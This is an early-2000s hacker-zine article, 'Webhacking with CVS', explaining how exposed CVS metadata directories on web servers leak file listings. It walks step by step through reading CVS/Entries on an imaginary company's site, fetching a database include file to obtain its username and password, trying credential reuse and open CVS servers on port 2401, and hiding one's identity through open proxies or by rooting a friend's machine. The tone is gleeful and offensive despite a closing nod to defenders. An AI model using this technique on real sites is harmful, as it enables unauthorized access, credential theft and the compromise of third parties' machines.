Webhacking with CVS
by methodic (methodic@libpcap.net)
When a project is checked out of the Concurrent Versions System (CVS) repository, CVS creates files to keep track of the checked out project (i.e., version numbers). Normally this isn't much of an issue, until using CVS to manage web content comes into play.
The severity of this issue is pretty big.
Let's take imaginary Company XYZ for example. Doing a quick search on Google you are able to find their homepage, say http://xyzinnovations.com.
To check to see if they use CVS to manage their website, you simply have to point your browser to http://xyzinnovations.com/CVS. If they're using CVS, one of two things should happen.
You will either get a message saying directory listings disabled, or you should see a list of files. Either one isn't important. What's important is that you now know they use CVS to manage their website content.
Now on to the fun stuff.
There are three common files found in CVS directories. They are Entries, Repository, and Root.
The Root file will tell you where the CVS repository is located. The Repository file will tell you the name of the project (the website content) in the CVS repository. The Entries file is the one we're interested in. The Entries file is a list of all files and directories within the project repository.
Here's a snippet from the Entries file for libpcap.net:
/patches.phtml/1.1.1.1/Sun Mar 30 15:27:37 2003// D/gfx//// D/orbs//// /code.phtml/1.4/Sun Mar 30 15:48:00 2003// /exploits.phtml/1.1.1.1/Sun Mar 30 15:48:04 2003// /index.phtml/1.2/Sun Mar 30 19:24:37 2003// D/aimcrack////As you can see this file discloses some very valuable information.
Let's go back to our example of Company XYZ. With this information, we point our browser to http://xyzinnovations.com/CVS/Entries. Bingo. Check out what we found:
D/includes//// D/docs//// /robots.txt/1.1/Fri Jun 15 11:52:37 2001// /docs.php/1.4/Thu Dec 13 10:06:26 2001// /index.php/1.15/Tue Aug 20 17:51:54 2002//Pretty interesting stuff.
Company XYZ appears to be using PHP (a powerful scripting language suited for website development). Also notice the includes directory. Since we know they're using PHP, we can assume that the includes directory contains PHP scripts that the website includes when parsing output. If you haven't used PHP at all, one of the most widely used functions in web development is include().
This function allows you to include files in your PHP script. This way, web developers only have to write something once, and they can use it over and over again by just calling an: include("/path/to/file")
Common examples of this include site layout (it makes more sense to edit one include file than 15 different static HTML pages), connecting to a database (if each page needs to connect to a database, why write the code 15 different times?), and so on.
So let's check out the includes directory, shall we? Be sure to use the same method; don't just go to http://xyzinnovations.com/includes because we already figured out XYZ's website doesn't allow directory listings. Instead go to this URL: http://xyzinnovations.com/includes/CVS/Entries
You should see something like this:
/connect_db.inc/1.1.1.1/Sun Mar 30 19:21:20 2003// /header.inc/1.1.1.1/Sun Mar 30 19:21:20 2003// /footer.inc/1.2/Sun Mar 30 19:56:43 2003// /close_db.inc/1.3/Mon Mar 31 16:56:22 2003//Notice the connect_db.inc file.
Logic would tell you that this include file handles opening a connection to a database. Let's check it out. Since this is a file, not a directory, you can just go to: http://xyzinnovations.com/includes/connect_db.inc
If this file is what we think it is, you should see something similar to this line in the file:
$link = mysql_connect("xyzinnovations.com", "xyz", "xyzzyx");Congratulations h4x0r... you now know the username and password they use to connect to the company database (xyz and xyzzyx respectively).
From this knowledge the possibilities are endless. How many times have you seen the same login/password used for different services? I've also seen a database server use the same login credentials for the database as it had on the server itself (same username/password).
Just to recap, to find out if a website is using CVS to manage their content, simply go to: http://site.com/CVS
In fact, since we're only really interested in the Entries file (for now), you can go directly to: http://site.com/CVS/Entries
By the output, you should be able to see which lines are files and which ones are directories (the directory entries begin with a D).
Using the Entries file, you should also be able to see the files under each directory by going to a similar URL: http://site.com/some_dir/CVS/Entries
Last but not least, know what to look for. I've seen it all. Include files, shell scripts, ZIP files of the site itself, PHP and CGI scripts with a -sav or -orig extension (the webserver won't parse those!).
Another thing you can try is to see if their CVS server is available to the world (usually runs on port 2401). If you find one open to you, grab the Repository file and try to run a cvs checkout with the project name. Yes, I've been able to CVS over an entire website, .htpasswd and all.
If you're a newbie to CVS, I highly suggest installing CVS and checking out this URL: cvsbook.red-bean.com/cvsbook.html
Webhacking with CVS files isn't a well-known technique, but it certainly is one of the most effective. Not only can you retrieve files off a server that might try to obscure their existence with directory listings turned off or by dropping an index.html file in the directory, but there are multiple ways to hide your true identity.
Grab an open WinGate proxy, put the IP address in Mozilla, and go to town. Or just r00t your friend's Red Hat 7.3 box and use lynx --source.
I hope both sides of the fence learned a thing or two about the dangers of using CVS to manage websites. CVS is a very powerful tool to manage projects, no doubt about it; just be aware of what it leaves behind and more importantly, who's there to take it.
Shout0uts: dmuz and the rest of the ap crew. congrats to victim1 on getting the 31336++ jobby, good luck in md. http://libpcap.net like woah.